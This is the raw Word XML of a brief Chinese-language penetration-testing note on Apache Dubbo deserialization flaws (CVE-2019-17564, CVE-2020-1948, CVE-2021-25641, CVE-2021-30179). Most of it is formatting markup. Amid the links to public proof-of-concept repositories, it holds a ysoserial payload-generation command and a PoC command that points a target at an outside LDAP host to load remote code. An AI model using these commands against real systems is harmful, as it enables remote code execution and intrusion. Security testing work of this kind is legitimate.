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Dubbo端口20880，</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可telnet连接，使用ls命令获取接口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:spacing w:after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CVE-2019-17564</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">：反序列化漏洞，利用较难，需要拿到一个service地址 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5750560" cy="3168650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="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after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32525" cy="3606165"/>
            <wp:effectExtent l="0" t="0" r="3175" b="635"/>
            <wp:docPr id="9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360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"https://github.com/federicodotta/Java-Deserialization-Scanner"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https://github.com/federicodotta/Java-Deserialization-Scanner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测试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java -jar ysoserial.jar CommonsCollections4 calc &gt; 1.ser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"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CVE-2020-1948：反序列化漏洞，默认端口为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20880</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。需要在机器上启动交互服务进行验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:spacing w:after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推荐使用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"https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md"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https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md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启动服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:spacing w:after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684135" cy="2327275"/>
            <wp:effectExtent l="0" t="0" r="12065" b="9525"/>
            <wp:docPr id="9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84135" cy="232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after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"https://github.com/scopion/cve-2020-1948-poc"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https://github.com/scopion/cve-2020-1948-poc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进行验证。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rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令格式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>python poc.py 1.1.1.1 12345 ldap://1.1.1.6:80/exp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:spacing w:after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CVE-2021-25641</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:spacing w:after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"https://github.com/scopion/CVE-2021-25641-Proof-of-Concept"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https://github.com/scopion/CVE-2021-25641-Proof-of-Concept</w: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spacing w:after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CVECVE-2021-30179：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:spacing w:after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https://cloud.tencent.com/developer/article/1865563</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"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pStyle w:val="7"/>
        <w:spacing w:after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"https://github.com/threedr3am/learnjavabug/tree/master/dubbo"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https://github.com/threedr3am/learnjavabug/tree/master/dubbo</w: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spacing w:after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"https://github.com/scopion/dubbo-exp"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https://github.com/scopion/dubbo-exp</w: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spacing w:after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"https://github.com/lz2y/DubboPOC"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https://github.com/lz2y/DubboPOC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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9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</w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:color w:val="auto"/>
      <w:szCs w:val="24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HTML Code"/>
    <w:basedOn w:val="4"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paragraph" w:customStyle="1" w:styleId="7">
    <w:name w:val="样式标题"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8">
    <w:name w:val="样式小标题"/>
    <w:basedOn w:val="1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2021-10-29T08:33:07Z</dcterms:created>
  <dc:creator>qbj</dc:creator>
  <cp:lastModifiedBy>bingjie</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-29T08:34:28Z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A10B386F4C984CE188B470F775FC8B0F</vt:lpwstr>
  </property>
</Properties>
</file>